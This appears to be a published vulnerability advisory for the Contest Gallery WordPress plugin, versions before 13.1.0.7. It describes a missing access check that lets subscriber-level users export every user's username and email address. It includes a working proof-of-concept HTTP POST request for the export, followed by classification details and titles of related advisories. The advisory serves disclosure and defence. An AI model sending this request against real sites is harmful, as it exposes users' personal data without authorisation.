Contest Gallery < 13.1.0.7 – Subscriber+ Email Address Disclosure | Plugin Vulnerabilities

Description

The plugin does not have any proper access controls when exporting users from a gallery, which could allow any authenticated users (such as subscriber) to list all users from the blog, disclosing their username and email address

Proof of Concept

POST /wp-admin/admin.php?page=contest-gallery/index.php&users_management=true&option_id=1 HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 65
Connection: close
Cookies; [subscriber+]
Upgrade-Insecure-Requests: 1

cg_create_user_data_csv_new_export=true&cg_create_user_data_csv=1

Affects Plugins

contest-gallery

Fixed in 13.1.0.7

Classification

Type

ACCESS CONTROLS

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

WPScanTeam

Verified

Yes

WPVDB ID

71eb90f2-bad2-4de7-9335-02697aee9ffe

Timeline

Publicly Published

2021-11-01 (about 4 years ago)

Added

2021-11-01 (about 4 years ago)

Last Updated

2021-11-01 (about 4 years ago)

Other

Published

Title

Published

2025-02-24

Title

Enfold < 7.0 - Missing Authorization to Sensitive Information Disclosure in avia-export-class.php

Published

2021-03-30

Title

Controlled Admin Access < 1.5.6 - Improper Access Control to Privilege Escalation

Published

2024-03-22

Title

WooCommerce Clover Payment Gateway < 1.3.2 - Missing Authorization via callback_handler

Published

2022-02-02

Title

Custom Content Shortcode < 4.0.2 - Authenticated Arbitrary File Access / LFI

Published

2022-05-16

Title

WPQA < 5.5 - Unauthenticated Private Message Disclosure